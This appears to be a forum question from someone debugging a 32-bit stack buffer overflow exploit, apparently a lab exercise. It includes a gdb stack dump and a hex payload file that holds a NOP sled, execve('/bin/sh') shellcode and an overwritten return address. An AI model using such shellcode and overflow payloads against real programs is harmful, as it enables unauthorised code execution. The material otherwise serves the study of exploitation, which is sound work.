I am doing a buffer overflow exploit and am trying to overwrite the return address 0x08048944 and point it towards my shell code which starts next to the address 0xffffda30.
0xffffda30: 0x6850c031 0x68732f2f 0x69622f68 0x50e3896e
0xffffda40: 0x99e18953 0x80cd0bb0 0x90909090 0x90909090
0xffffda50: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffda60: 0xffffd760 0x000002fc 0x0804b410 0x00000304
0xffffda70: 0xf7fbdd60 0xffffdad0 0xffffdab8 0x08048944
The buffer itself is at the address 0xffffd760 after 0xffffda60. However I am unable to overwrite it without receiving a segmentation fault. Below is my exploit file that is a bunch of NOP's. I convert the file to binary using a python converter code so I could be able to feed the badfile into gdb. I have tried just copying the address of the buffer and the 3 addresses following it into my exploit file, so that the area remains unchanged as I added more NOP's afterwards until I reach the return address but it still results in a segmentation fault.
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
31c050682f2f7368682f62696e89e3505389e199b00bcd80
90909090909090909090909090909090
60d7ffff9090909090909090
User contributions licensed under CC BY-SA 3.0